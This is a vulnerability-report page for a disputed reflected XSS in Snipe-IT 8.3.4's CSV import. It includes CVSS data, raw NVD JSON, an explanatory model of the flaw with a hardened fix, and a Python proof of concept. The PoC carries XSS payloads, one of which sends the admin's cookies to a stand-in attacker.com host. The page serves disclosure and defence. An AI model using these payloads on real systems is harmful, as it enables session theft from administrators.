Security Vulnerability Report
CVE-2025-64027 CVSS 6.1 MEDIUM

Published: 2025-11-20 17:15:53
Last Modified: 2025-11-26 16:15:50

Description

Snipe-IT v8.3.4 (build 20218) contains a reflected cross-site scripting (XSS) vulnerability in the CSV Import workflow. When an invalid CSV file is uploaded, the application returns a progress_message value that is rendered as raw HTML in the admin interface. An attacker can intercept and modify the POST /livewire/update request to inject arbitrary HTML or JavaScript into the progress_message. Because the server accepts the modified input without sanitization and reflects it back to the user, arbitrary JavaScript executes in the browser of any authenticated admin who views the import page. NOTE: this is disputed by the Supplier because the report only demonstrates that an authenticated user can choose to conduct a man-in-the-middle attack against himself.
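The two mistakes the description combines (the server accepting a client-side write to a property it should own, and the view rendering that property as raw HTML) are easiest to see in a reduced model. The following is an added example, not Snipe-IT or Livewire code: the component classes, property names and the `updates`/`syncInput` request shape are simplified stand-ins for the real wire format, and the request bodies are constructed. It puts the vulnerable behaviour beside a hardened version that whitelists client-writable properties and escapes output.

```python
import html
from dataclasses import dataclass

# Constructed request bodies standing in for POST /livewire/update.
# The real wire format carries more (snapshot, checksum, CSRF token);
# only the "updates" list matters for the point made here.
BENIGN_UPDATE = {
    "updates": [{"type": "syncInput",
                 "payload": {"name": "file_name", "value": "assets.csv"}}],
}
MALICIOUS_UPDATE = {
    "updates": [{"type": "syncInput",
                 "payload": {"name": "progress_message",
                             "value": "<script>alert(document.cookie)</script>"}}],
}


@dataclass
class VulnerableImport:
    """Accepts any syncInput and renders progress_message as raw HTML."""
    file_name: str = ""
    progress_message: str = ""

    def apply(self, request):
        for upd in request["updates"]:
            if upd["type"] == "syncInput":
                # No check that the client is allowed to write this property.
                setattr(self, upd["payload"]["name"], upd["payload"]["value"])

    def render(self):
        # Equivalent to an unescaped {!! $progress_message !!} in a Blade view.
        return f'<div class="import-progress">{self.progress_message}</div>'


@dataclass
class HardenedImport:
    """Only whitelisted properties are client-writable; output is escaped."""
    CLIENT_WRITABLE = frozenset({"file_name"})  # progress_message is server-owned
    file_name: str = ""
    progress_message: str = ""

    def apply(self, request):
        for upd in request["updates"]:
            if upd["type"] != "syncInput":
                continue
            name = upd["payload"]["name"]
            if name not in self.CLIENT_WRITABLE:
                raise PermissionError(f"client may not set property {name!r}")
            setattr(self, name, upd["payload"]["value"])

    def set_progress(self, message):
        # Only server-side code (e.g. the CSV validator) writes this value.
        self.progress_message = message

    def render(self):
        # Equivalent to an escaped {{ $progress_message }} in Blade.
        return f'<div class="import-progress">{html.escape(self.progress_message)}</div>'


def vulnerable_render(request):
    comp = VulnerableImport()
    comp.apply(request)
    return comp.render()


def hardened_render(request, server_message="Import failed: invalid CSV"):
    comp = HardenedImport()
    comp.apply(request)            # raises for server-owned properties
    comp.set_progress(server_message)
    return comp.render()


if __name__ == "__main__":
    print(vulnerable_render(MALICIOUS_UPDATE))
    try:
        hardened_render(MALICIOUS_UPDATE)
    except PermissionError as err:
        print("rejected:", err)
    # Even if a hostile string reaches progress_message server-side,
    # escaping keeps it inert in the page.
    print(hardened_render(BENIGN_UPDATE, server_message="<img src=x onerror=alert(1)>"))
```

The whitelist is the part that addresses the dispute: once the server refuses client writes to `progress_message`, the only remaining question is whether any server-side path can put attacker-controlled text into it, and escaping on output closes that regardless.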

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Note: this is a Secondary score from the ADP source shown in the raw data below, and the vector is the generic reflected-XSS template (PR:N, UI:R, S:C). It does not account for the dispute: the only attacker the report demonstrates is an already-authenticated admin tampering with their own POST /livewire/update request, which crosses no privilege boundary. Treat 6.1 as an upper bound unless a cross-user trigger (a crafted link, a shared page, or persisted state) is shown.

Configurations (Affected Products)

cpe:2.3:a:snipeitapp:snipe-it:8.3.4:*:*:*:*:*:*:* - VULNERABLE
Snipe-IT v8.3.4 (build 20218)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-64027 PoC - Snipe-IT CSV Import Reflected XSS
# Attack scenario: MITM proxy modification of a Livewire request.
# The flow follows the published PoC. The Livewire request body below is a
# skeleton: a real attempt needs the component id, serverMemo/snapshot and
# checksum copied from a POST /livewire/update captured in the proxy.
import re
import requests

target_url = "http://target-server/snipe-it"
login_url = f"{target_url}/login"
import_url = f"{target_url}/api/v1/imports"
livewire_update_url = f"{target_url}/livewire/update"

# Step 1: Authenticate as admin user.
# Snipe-IT is a Laravel application, so the login form carries a hidden
# "_token" CSRF field that must be sent back; fetch the form first and
# check it for the exact field names (_token, email/username, password).
session = requests.Session()
login_page = session.get(login_url)
csrf = re.search(r'name="_token"\s+value="([^"]+)"', login_page.text)
login_data = {
    '_token': csrf.group(1) if csrf else '',
    'email': '[email protected]',
    'password': 'admin_password',
}
session.post(login_url, data=login_data)

# Step 2: Upload an invalid CSV file to trigger the import workflow.
# (Snipe-IT's REST API normally expects a Bearer API token rather than the
# web session cookie; add an Authorization header if this upload returns 401.)
csv_content = "asset_tag,serial\nTEST001,INVALID"
upload_files = {'file': ('test.csv', csv_content, 'text/csv')}
response = session.post(import_url, files=upload_files)
print(f"Upload status: {response.status_code}")

# Step 3: Intercept and modify the Livewire update request.
# In a real attack, use Burp Suite or another MITM proxy to intercept the
# request and modify the progress_message parameter in POST /livewire/update.
# Original request body structure:
livewire_request = {
    'component': 'ImportSoftware',  # or the relevant import component
    'progress_message': '<script>alert(document.cookie)</script>',
    'fingerprint': {
        'id': 'some-component-id',
        'name': 'import-component',
        'path': 'admin/import',
        'method': 'POST',
    },
    'serverMemo': {
        'id': 'server-memo-id',
        'data': {},
        'checksum': 'some-checksum',
    },
    'updates': [
        {
            'type': 'syncInput',
            'payload': {
                'name': 'progress_message',
                'value': '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>',
            },
        },
    ],
}

# Step 4: Send the modified request.
modified_response = session.post(
    livewire_update_url,
    json=livewire_request,
    headers={'Content-Type': 'application/json'},
)
print(f"Livewire update status: {modified_response.status_code}")
print("XSS payload sent. Check if the cookie-stealing script executes in the admin browser.")
```

References

https://github.com/cybercrewinc/CVE-2025-64027/ (Exploit, Third Party Advisory)
https://github.com/grokability/snipe-it (Product)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64027",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-20T17:15:52.873",
    "lastModified": "2025-11-26T16:15:50.103",
    "vulnStatus": "Modified",
    "cveTags": [
      {"sourceIdentifier": "[email protected]", "tags": ["disputed"]}
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "Snipe-IT v8.3.4 (build 20218) contains a reflected cross-site scripting (XSS) vulnerability in the CSV Import workflow. When an invalid CSV file is uploaded, the application returns a progress_message value that is rendered as raw HTML in the admin interface. An attacker can intercept and modify the POST /livewire/update request to inject arbitrary HTML or JavaScript into the progress_message. Because the server accepts the modified input without sanitization and reflects it back to the user, arbitrary JavaScript executes in the browser of any authenticated admin who views the import page. NOTE: this is disputed by the Supplier because the report only demonstrates that an authenticated user can choose to conduct a man-in-the-middle attack against himself."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:snipeitapp:snipe-it:8.3.4:*:*:*:*:*:*:*",
                "matchCriteriaId": "D572C66C-FEB2-4976-AD9E-ECFB8507CDF7"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/cybercrewinc/CVE-2025-64027/",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://github.com/grokability/snipe-it",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}